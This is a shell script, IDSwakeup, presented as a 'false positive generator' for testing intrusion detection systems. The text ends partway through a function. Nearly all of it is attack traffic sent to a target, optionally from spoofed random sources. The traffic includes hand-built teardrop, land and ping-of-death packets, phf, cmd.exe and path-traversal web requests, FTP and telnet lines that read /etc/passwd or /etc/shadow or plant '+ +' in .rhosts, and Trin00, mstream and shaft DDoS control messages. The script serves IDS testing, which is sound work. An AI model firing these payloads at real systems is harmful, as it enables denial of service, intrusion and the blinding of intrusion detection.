#!/bin/sh
# IDSwakeup
# Stephane Aubert
# Herv Schauer Consultants (c) 2000
# see LICENSE file

### Usage & Banner #######
trap End 2 3 6 10 12 15 19
#color from vetescan
if [ $color -eq 1 ] ; then
 blink="[5m";   cl="[0m";      mag="[35m";    cyn="[36m"; 
 red="[31m";    hblk="[1;30m"; hmag="[1;35m"; hcyn="[1;36m"
 hwht="[1;37m"; hred="[1;31m"; bblk="[40m";   bred="[41m"
 bmag="[45m";   bcyn="[46m";   bwht="[47m";   bg="[44m"
 wht="[37m"
fi 

Banner () {
  clear
  echo $red
  echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
  echo "-  IDSwakeup : false positive generator               -"
  echo "-  Stephane Aubert                                    -"
  echo "-  Herv Schauer Consultants (c) 2000                 -"
  echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
  echo $cl
}

Usage () {
  echo "  ${cyn}Usage : $0 <src addr> <dst addr> [nb] [ttl]${cl}"
  echo 
  exit
}

End () {
  echo
  echo "${red}-=- Bye ! - sa/hsc -=-${cl}"
  echo 
  exit
}
### Define  ##############
IWU='./iwu'
## Patch hping2 in hping2.h
## change : #define COUNTREACHED_TIMEOUT 10
## by     : #define COUNTREACHED_TIMEOUT 1
HPING='./hping2'

verbose=2

### Vars #################
nb=1
ttl=1
src='127.0.0.1'
dst='127.0.0.1'
unp=6666
### Args #################
Banner
if [ $# -lt 2 ] ; then 
  Usage
else 
  src=$1
  dst=$2
fi
if [ "$src" = "0" ] ; then
  spoofsrc=1
else
  spoofsrc=0
fi
if [ $# -ge 3 ] ; then 
  nb=$3
fi
if [ $# -ge 4 ] ; then 
  ttl=$4
fi
echo "  ${hblk}src_addr:$src  dst_addr:$dst  nb:$nb   ttl:$ttl ${cl}"
echo
### Script ###############
IDSwakeup () { 
  send teardrop
  send land
  send get_phf
  send bind_version
  send get_phf_syn_ack_get
  send ping_of_death
  send syndrop
  send newtear
  send X11
  send SMBnegprot
  send smtp_expn_root
  send finger_redirect
  send ftp_cwd_root
  send ftp_port
  send trin00_pong
  send back_orifice
  send msadcs
  send www_frag
  send www_bestof
#  send www_all
  send ddos_bestof
  send ftp_bestof
  send telnet_bestof
  send rlogin_bestof
  send tcpflag_bestof
  send icmp_bestof
  send smtp_bestof
  send misc_bestof
  send dos_chargen
  send dos_snork
  send dos_syslog 
}

### Howto write sig ######
### use tcpdumpx from Wietse Venema
#    IP_HDR    vhl/tos len/len id/id   off/off ttl/pro sum/sum src/src src/src  
#    IP_HDR    dst/dst dst/dst 
#    IP_OPT    ....
#
#    UDP_HDR                   src/src dst/dst len/len sum/sum 
#
#    TCP_HDR                   src/src dst/dst seq/seq seq/seq ack/ack ack/ack 
#    TCP_HDR   off/flg win/win sum/sum urp/urp   
#
#    ICMP_HDR                  code/type   

### Functions ############
seed=`expr $$ % 255`
rand=0
random () {
  mult=25173; inc=13849; mod=65536
  number=`expr \( $seed \* $mult + $inc \) % $mod`
  seed=$number
  rand=`expr $number % 200 + 50`
}

gensrc () {
  if [ $spoofsrc -eq 1 ] ; then
    random; a=$rand
    random; b=$rand
    random; c=$rand
    random; d=$rand
    src="${a}.${b}.${c}.${d}"
  fi
}

genunp () {
  random
  unp=`expr $rand + 1531` ## why not ?
}

send () {
  if [ $# -eq 1 ] ; then
    echo "  ${hblk}sending :${cl} ${mag}$1${cl} ${hblk}...${cl}"
    $1
  else
    echo "run needs an arg !"
  fi
}

trace () {
  proto=$1
  paylod=$2
  if [ $verbose -gt 1 ] ; then buf="$src -> $dst" 
  else buf='' 
  fi
  if [ $verbose -gt 0 ] ; then
    echo "            ${hblk}$buf $proto$cl  ${cyn}$payload${cl}" 
  fi
}

udpsend () {
  sport=$1
  dport=$2
  payload=$3
  count=`/bin/echo -n "$payload"|wc -c`
  gensrc
  trace "${dport}/udp"  "$payload"
  $HPING -q --udp  -a $src $dst -s $sport -k -p $dport  -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null
}

tcpsend () {
  port=$1
  payload=$2
  count=`/bin/echo -n "$payload"|wc -c`
  gensrc
  trace "${port}/tcp"  "$payload"
  $HPING -q -a $src $dst -PA -p $port  -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null
}

tcpsendflag () {
  sport=$1
  dport=$2
  flags=$3
  payload=$4
  count=`/bin/echo -n "$payload"|wc -c`
  gensrc
  trace "${dport}/tcp $flags"  "$payload"
  $HPING -q -a $src $dst $flags -s $sport -k -p $dport  -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null
}

tcpfragsend () {
  port=$1
  payload=$2
  count=`/bin/echo -n "$payload"|wc -c`
  gensrc
  trace "${port}/fragmented-tcp"  "$payload"
  $HPING -q -a $src $dst -PA --mtu 16 -p $port -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null
}

icmpsend () {
  type=$1
  code=$2
  payload=$3
  count=`/bin/echo -n "$payload"|wc -c`
  gensrc 
  trace "icmp type:$type code:$code"  "$payload"
  $HPING -q --icmp -C $type -K $code -a $src $dst  -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null
}

#-- Using hping ----------

msadcs () {
  tcpsend 80 'GET /msadc/msadcs.dll HTTP/1.0
 
 '
}

www_frag () {
  tcpfragsend 80 'GET /................................... HTTP/1.0'
  tcpfragsend 80 'GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
                  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
                  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
                  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../cgi-bin/phf HTTP/1.0'
}

www_bestof () {
  tcpsend 80 'GET  /  HTTP/1.0' 
  tcpsend 80 'GET //////// HTTP/1.0'
  tcpsend 80 'HEAD  /  HTTP/1.0'
  tcpsend 80 'HEAD/./'
  tcpsend 80 '/cgi-bin\\handler'
  tcpsend 80 '/cgi-bin\\webdist.cgi'
  tcpsend 80 '/mlog.phtml'
  tcpsend 80 '/mylog.phtml'
  tcpsend 80 '/cfide\\administrator\\startstop.html'
  tcpsend 80 '/cfappman\\index.cfm'
  tcpsend 80 '/mall_log_files\\order.log'
  tcpsend 80 '/admin_files\\order.log'
  tcpsend 80 '/cgi-bin\\wrap'
  tcpsend 80 'GET /cgi-bin/ph%66 HTTP/1.0'
  tcpsend 80 'GET /sahsc.lnk HTTP/1.0'  
  tcpsend 80 'GET /sahsc.bat HTTP/1.0'  
  tcpsend 80 'GET /sahsc.url HTTP/1.0'  
  tcpsend 80 'GET /sahsc.ida HTTP/1.0'  
  tcpsend 80 'GET /default.asp::$DATA HTTP/1.0'  
  tcpsend 80 'GET 	/	 HTTP/1.0'  
  tcpsend 80 'PUT /scripts/cmd.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/cmd.exe HTTP/1.0'
  tcpsend 80 'BAD /scripts/cmd.exe HTTP/1.0'
  tcpsend 80 'GET /_vti_pvt/administrators.pwd HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/handler HTTP/1.0'
  tcpsend 80 'GET /../../../../../../etc/passwd HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/perl.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/tools/newdsn.exe HTTP/1.0'
  tcpsend 80 'GET /search97.vts HTTP/1.0'
  tcpsend 80 'GET /IISADMIN HTTP/1.0'
}

www_all () {
  tcpsend 80 'GET  /  HTTP/1.0'
  tcpsend 80 'GET ../.. HTTP/1.0'
  tcpsend 80 'GET ../../boot.ini HTTP/1.0'
  tcpsend 80 'GET /......../ HTTP/1.0'
  tcpsend 80 'GET /....../autoexec.bat HTTP/1.0'
  tcpsend 80 'GET /.cshrc HTTP/1.0'
  tcpsend 80 'GET /.profile HTTP/1.0'
  tcpsend 80 'GET /.html/............../config.sys HTTP/1.0'
  tcpsend 80 'GET /?PageServices HTTP/1.0'
  tcpsend 80 'GET /PDG_Cart/order.log HTTP/1.0'
  tcpsend 80 'GET /PDG_Cart/shopper.conf HTTP/1.0'
  tcpsend 80 'GET /WebShop/logs/cc.txt HTTP/1.0'
  tcpsend 80 'GET /WebShop/templates/cc.txt HTTP/1.0'
  tcpsend 80 'GET /_vti_bin/shtml.dll HTTP/1.0'
  tcpsend 80 'GET /_vti_bin/shtml.exe HTTP/1.0'
  tcpsend 80 'GET /_vti_inf.html HTTP/1.0'
  tcpsend 80 'GET /_vti_pvt/admin.pwd HTTP/1.0'
  tcpsend 80 'GET /_vti_pvt/administrators.pwd HTTP/1.0' 
  tcpsend 80 'GET /_vti_pvt/authors.pwd HTTP/1.0'
  tcpsend 80 'GET /_vti_pvt/service.pwd HTTP/1.0'
  tcpsend 80 'GET /_vti_pvt/users.pwd HTTP/1.0'
  tcpsend 80 'GET /_vti_pwd/administrators.pwd HTTP/1.0'
  tcpsend 80 'GET /adsamples/config/site.csc HTTP/1.0'
  tcpsend 80 'GET /aux HTTP/1.0'
  tcpsend 80 'GET /carbo.dll HTTP/1.0'
  tcpsend 80 'GET /cfappman/index.cfm HTTP/1.0'
  tcpsend 80 'GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0'
  tcpsend 80 'GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0'
  tcpsend 80 'GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0'
  tcpsend 80 'GET /cfdocs/expelval/openfile.cfm HTTP/1.0'
  tcpsend 80 'GET /cfdocs/expelval/sendmail.cfm HTTP/1.0'
  tcpsend 80 'GET /cfdocs/expelvel/openfile.cfm HTTP/1.0'
  tcpsend 80 'GET /cfdocs/snippets/fileexist.cfm HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/ HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/AT-admin.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/AnyBoard.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/AnyForm2 HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/Count.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/FormHandler.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/LWGate HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/LWGate.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/MachineInfo HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/add_ftp.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/aglimpse HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/alibaba.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/archie HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/architext_query.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/ax-admin.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/ax.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/axs.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/bigconf.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/bnbform.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/cachemgr.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/campas HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/cgitest.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/cgiwrap HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/classified.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/classifieds.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/day5datacopier.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/dbmlparser.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/download.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/dumpenv.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/edit.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/environ.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/faxsurvey HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/filemail.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/filemail.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/files.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/finger HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/flexform.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/gH.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/get32.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/glimpse HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/guestbook.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/guestbook.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/handler HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/htmlscript HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/icat HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/imagemap.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/info2www HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/jj HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/lwgate HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/lwgate.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/maillist.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/maillist.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/man.sh HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/meta.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/mlog.phtml HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/nlog-smb.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/nph-error.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/nph-publish HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/nph-test-cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/passwd HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/passwd.txt HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/password HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/password.txt HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/perl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/perl.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/perlshop.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/pfdisplay HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/pfdisplay.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/phf HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/php HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/php.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/post_query HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/ppdscgi.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/query HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/responder.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/rguest.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/rpm_query HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/search.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/survey.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/test-cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/test-cgi.tcl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/textcounter.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/tst.bat HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/unlg1.1 HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/unlg1.2 HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/upload.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/view-source HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/w3-msql/ HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/webbbs.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/webdist.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/webgais HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/webmap.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/websendmail HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/wguest.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/whois_raw.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/www-sql HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/wwwboard.cgi HTTP/1.0'
  tcpsend 80 'GET /cgi-bin/wwwboard.pl HTTP/1.0'
  tcpsend 80 'GET /cgi-dos/args.bat HTTP/1.0'
  tcpsend 80 'GET /cgi-shl/win-c-sample.exe HTTP/1.0'
  tcpsend 80 'GET /cgi-win/uploader.exe HTTP/1.0'
  tcpsend 80 'GET /com1 HTTP/1.0'
  tcpsend 80 'GET /com2 HTTP/1.0'
  tcpsend 80 'GET /com3 HTTP/1.0'
  tcpsend 80 'GET /con HTTP/1.0'
  tcpsend 80 'GET /default.asp. HTTP/1.0'
  tcpsend 80 'GET /default.asp::$DATA HTTP/1.0'
  tcpsend 80 'GET /domcfg.nsf/?open HTTP/1.0'
  tcpsend 80 'GET /iisadmpwd/achg.htr HTTP/1.0'
  tcpsend 80 'GET /iisadmpwd/aexp2.htr HTTP/1.0'
  tcpsend 80 'GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0'
  tcpsend 80 'GET /iissamples/exair/search/advsearch.asp HTTP/1.0'
  tcpsend 80 'GET /iissamples/iissamples/query.asp HTTP/1.0'
  tcpsend 80 'GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0'
  tcpsend 80 'GET /lpt HTTP/1.0'
  tcpsend 80 'GET /msadc/msadcs.dll HTTP/1.0'
  tcpsend 80 'GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0'
  tcpsend 80 'GET /photoads/ HTTP/1.0'
  tcpsend 80 'GET /photoads/cgi-bin/ HTTP/1.0'
  tcpsend 80 'GET /photoads/cgi-bin/env.cgi HTTP/1.0'
  tcpsend 80 'GET /publisher/ HTTP/1.0'
  tcpsend 80 'GET /pw/storemgr.pw HTTP/1.0'
  tcpsend 80 'GET /quikstore.cfg HTTP/1.0'
  tcpsend 80 'GET /samples/search/queryhit.htm HTTP/1.0'
  tcpsend 80 'GET /sahsc.ida HTTP/1.0'
  tcpsend 80 'GET /sahsc.idq HTTP/1.0'
  tcpsend 80 'GET /sahsc.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr HTTP/1.0'
  tcpsend 80 'GET /scripts/../../cmd.exe?%2FC+echo+"hello">c:\hello.bat HTTP/1.0'
  tcpsend 80 'GET /scripts/CGImail.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/convert.bas HTTP/1.0'
  tcpsend 80 'GET /scripts/counter.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/cpshost.dll HTTP/1.0'
  tcpsend 80 'GET /scripts/fpcount.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/iisadmin/bdir.htr HTTP/1.0'
  tcpsend 80 'GET /scripts/issadmin/bdir.htr HTTP/1.0'
  tcpsend 80 'GET /scripts/perl.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/proxy/w3proxy.dll HTTP/1.0'
  tcpsend 80 'GET /scripts/pu3.pl HTTP/1.0'
  tcpsend 80 'GET /scripts/samples/search/webhits.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/tools/getdrvs.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/tools/newdsn.exe HTTP/1.0'
  tcpsend 80 'GET /scripts/visadmin.exe HTTP/1.0'
  tcpsend 80 'GET /search HTTP/1.0'
  tcpsend 80 'GET /search97.vts HTTP/1.0'
  tcpsend 80 'GET /session/admnlogin HTTP/1.0'
  tcpsend 80 'GET /ssi/envout.bat HTTP/1.0'
  tcpsend 80 'GET /status HTTP/1.0'
}

smtp_bestof () {
  tcpsend 25 'rcpt to: bouncebounce'
  tcpsend 25 'expn root'
  tcpsend 25 'expn decode'
  tcpsend 25 'debug'
  tcpsend 25 'vrfy smtp'
  tcpsend 25 'mail from: |'
  tcpsend 25 'rcpt to: |'
}

ftp_bestof () {
  tcpsend 21 'PORT 127,0,0,1,0,23'
  tcpsend 21 'PORT 10,6,6,6,0,23'
  tcpsend 21 'PORT 127,0,0,1,255,510'
  tcpsend 21 'passwd'
  tcpsend 21 'site exec %p%p%p%p%p%p'
  tcpsend 21 'SITE exec cat /etc/passwd ;-)'
  tcpsend 21 'SYST /etc/passwd ;-)'
  tcpsend 21 'SYST'
  tcpsend 21 'CWD ~root'
  tcpsend 21 'STOR |'
  tcpsend 21 'RETR |'
}

telnet_bestof () {
  tcpsend 23 'ciscociscociscociscociscociscociscociscociscociscocisco'
  tcpsend 23 '                                                    bof'
  tcpsend 23 'IFS=/'
  tcpsend 23 'su - root'
  tcpsend 23 'su root'
  tcpsend 23 'id; cat /etc/shadow'
  tcpsend 23 'echo "+ +">.rhosts'
  tcpsend 23 'resolv_host_conf'
  tcpsend 23 'ld_preload'
  tcpsend 23 'ld_library_pat'
}

rlogin_bestof () {
  tcpsend 513 'IFS=/'
  tcpsend 513 'su - root'
  tcpsend 513 'su root'
  tcpsend 513 'id; cat /etc/shadow'
  tcpsend 513 'echo "+ +">.rhosts'
}

dos_chargen () {
  udpsend 7 19 'hello'
}

dos_snork () {
  udpsend 135 135 'hi !...'
}

dos_syslog () {
  genunp
  udpsend $unp 514 'B0MB'
}

tcpflag_bestof () {
  genunp; tcpsendflag $unp 80 '-SF'      ''
  genunp; tcpsendflag $unp 80 '-SR'      ''
  genunp; tcpsendflag $unp 80 ''         ''
  genunp; tcpsendflag $unp 80 '-A'       '' 
  genunp; tcpsendflag $unp 80 '-SFR'     ''
  genunp; tcpsendflag $unp 80 '-SFARPXY' ''
  genunp; tcpsendflag $unp 80 '-SA'      ''
  genunp; tcpsendflag $unp 80 '-SAFR'    ''
  genunp; tcpsendflag $unp 80 '-XY'      ''
  #cisco ident 
  genunp; tcpsendflag $unp 1999 '-S'      ''
}

icmp_bestof () {
  icmpsend 0 0 ''
  icmpsend 0 0 'Hi B0B !...'

  icmpsend 3 0 ''
  icmpsend 3 1 ''
  icmpsend 3 2 ''
  icmpsend 3 3 ''
  icmpsend 3 4 ''
  icmpsend 3 5 ''
  icmpsend 3 13 ''
  icmpsend 3 14 ''
  icmpsend 3 15 ''

  icmpsend 4 0 ''

  icmpsend 5 0 ''
  icmpsend 5 1 ''
  icmpsend 5 2 ''
  icmpsend 5 3 ''

  icmpsend 8 0 ''

  icmpsend 11 0 ''
  icmpsend 11 1 ''

  icmpsend 12 0 ''
  icmpsend 13 0 ''
  icmpsend 14 0 ''
  icmpsend 15 0 ''
  icmpsend 16 0 ''
  icmpsend 17 0 ''
  icmpsend 18 0 ''
}

misc_bestof () {
  # src_addr = 127.0.0.1
  $HPING -q -a 127.0.0.1 $dst -S -p 25 -i u100 -t $ttl -c $nb 1>/dev/null 2>/dev/null  
  # IP options-Record Packet Route
  $HPING -q -a $src $dst -G -S -p 25 -i u100 -t $ttl -c $nb 1>/dev/null 2>/dev/null   
  #bad tcp checksum
   $HPING -q -a $src $dst -b -S -p 111 -i u100 -t $ttl -c $nb 1>/dev/null 2>/dev/null   
  #SNMP
  genunp; udpsend $unp 161 'public'
  genunp; udpsend $unp 161 'private'
  genunp; udpsend $unp 161 'all private' 
  genunp; udpsend $unp 162 'trap trap trap ...' 
  #pcanywhere
  tcpsend 5631 'ADMINISTRATOR'
  # rpc high port
  genunp
  tcpsendflag $unp 32771 '-S' ''
  # Napster
  tcpsend 6699 '.mp3'
  tcpsend 8888 '.mp3'
  tcpsend 7777 '.mp3'
  tcpsend 6666 '.mp3'
  tcpsend 5555 '.mp3'
  tcpsend 4444 '.mp3'
  tcpsend 8875 'anon@napster.com'
}

ddos_bestof () {
  # mstream : client to handler
  genunp
  tcpsendflag $unp 15104 '-S' '' 
  # mstream : handler to client
  genunp
  tcpsendflag 12754 $unp '-PA' '>' 
  # mstream : client to handler
  genunp
  tcpsendflag $unp 12754 '-PA' '>'
  # mstream : agent pong to handler
  genunp; udpsend $unp 10498 'pong'
  # mstream : handler ping to agent 
  genunp; udpsend $unp 10498 'ping'
  # mstream : handler to agent 
  genunp; udpsend $unp 10498 'stream/' 
  # mstream : agent to handler
  genunp; udpsend $unp 6838 'newserver'
  # Trin00
  tcpsend 27665 'killme'
  genunp; udpsend $unp  31335 'PONG'
  genunp; udpsend 31335 $unp 'l44'
  genunp; udpsend 31335 $unp '*HELLO*'
  tcpsend 27665 'gOrave'
 
  # shaft
  tcpsend 20432 ''
  genunp; udpsend $unp 18753 'alive tijgu'
  genunp; udpsend $unp 20433 'alive' 
  genunp
  tcpsendflag 23 $unp '-S --setseq 674711609' ''
}



#-- Using tcpdump --------

teardrop () {
  $IWU $src $dst $nb $ttl "\
                         4500 0038 00f2 2000 4011 53be 0101 0101 \
                         0202 0202 e63e 4494 0024 0000 0000 0000 \
                         0000 0000 0000 0000 0000 0000 0000 0000 \
                         0000 0000 0000 0000"
  $IWU $src $dst $nb $ttl "\
                         4500 0018 00f2 0003 4011 73db 0101 0101 \
                         0202 0202 e63e 4494"
}

land () {
  #careful : src = dst
  $IWU $dst $dst $nb $ttl "\
                         4500 0028 0f1c 0000 ff06 a4ac 0202 0202 \
                         0202 0202 0035 0035 0000 0f1c 0000 0000 \
                         5002 0800 9055 0000"
}

get_phf () {
  $IWU $src $dst $nb $ttl "\
                         4500 004f 231f 4000 4006 c254 0101 0101 \
                         0202 0202 0669 0050 640e 6204 73d4 effa \
                         8018 7d78 9659 0000 0101 080a 00ef 609d \
                         0b64 df29 4745 5420 2f63 6769 2d62 696e \
                         2f70 6866 2048 5454 502f 312e 300a 0a"
}

bind_version () {
  $IWU $src $dst $nb $ttl "\
    4500 003a 233a 0000 4011 0244 0101 0101 \
    0202 0202 04e1 0035 0026 82ab 0006 0100 \
    0001 0000 0000 0000 0776 6572 7369 6f6e \
    0462 696e 6400 0010 0003"
}

get_phf_syn_ack_get () {
  $IWU $src $dst $nb $ttl "\
    4500 003c 22af 4000 4006 c2d7 0101 0101 \
    0202 0202 0662 0050 ed75 49e4 0000 0000 \
    a002 7d78 b73e 0000 0204 05b4 0402 080a \
    00ec 7f22 0000 0000 0103 0300"
  $IWU $src $dst $nb $ttl "\
    4500 0034 22b0 4000 4006 c2de 0101 0101 \
    0202 0202 0662 0050 ed75 49e5 fce2 41ce \
    8010 7d78 9e35 0000 0101 080a 00ec 7f22 \
    0b61 fdab"
  $IWU $src $dst $nb $ttl "\
    4500 004f 22ff 4000 4006 c274 0101 0101 \
    0202 0202 0667 0050 54a6 4c48 65f5 9f89 \
    8018 7d78 cdaf 0000 0101 080a 00ef 06b0 \
    0b64 8537 4745 5420 2f63 6769 2d62 696e \
    2f70 6866 2048 5454 502f 312e 300a 0a"
}

ping_of_death () {
  $IWU $src $dst $nb $ttl "\
    4500 0190 10e1 3e3e ff01 1618 0101 0101 \
    0202 0202 0000 0000 0000 0000 0000 0000 \ 
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000"
}

syndrop () {
  $IWU $src $dst $nb $ttl "\ 
    4500 003c 00f2 2000 4006 0491 0101 0101 \
    0202 0202 c305 9fe7 0000 0000 0000 0000 \
    0030 0200 0000 0000 0000 0000 0000 0000 \
    0000 0000 110d 0000 ffff ffff"
}

newtear () {
  $IWU $src $dst $nb $ttl "\
    4500 0030 00f2 2000 4011 0492 0101 0101 \
    0202 0202 74f0 5cdf 0030 0000 0000 0000 \
    0000 0000 0000 0000 0000 0000 0000 0000"
  $IWU $src $dst $nb $ttl "\
    4500 0018 00f2 0003 4011 24a7 0101 0101 \
    0202 0202 74f0 5cdf"
}

X11 () {
  $IWU $src $dst $nb $ttl "\
    4500 003c 24b5 4000 4006 c0d1 0101 0101 \
    0202 0202 068d 1770 ec25 e2d3 0000 0000 \
